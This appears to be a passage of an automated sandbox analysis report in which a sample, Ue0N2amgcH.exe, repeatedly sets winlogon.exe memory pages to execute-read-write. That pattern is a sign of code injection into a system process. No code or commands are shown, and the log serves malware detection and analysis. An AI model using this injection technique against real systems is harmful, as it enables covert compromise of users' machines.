Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D000000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D001000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D012000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D014000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D016000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D020000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D021000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D032000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D034000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D036000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D040000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D041000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D052000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D054000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D056000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D060000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D061000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D072000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D074000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D076000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D080000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D081000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D092000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D094000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D096000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D100000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D101000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D112000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D114000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D116000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D120000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D121000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D132000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D134000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D136000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D140000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D141000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D152000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D154000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D156000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D160000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D161000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D172000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D174000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D176000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D180000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D181000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D192000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D194000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D196000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D200000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D201000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D212000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D214000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D216000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D220000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D221000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D232000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D234000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D236000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D240000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D241000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D252000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D254000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D256000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D260000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D261000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D272000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D274000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D276000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D280000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D281000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D292000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D294000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D296000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D300000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D301000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D312000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D314000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D316000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D320000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D321000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D332000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D334000 protect: page execute and read and writeJump to behavior
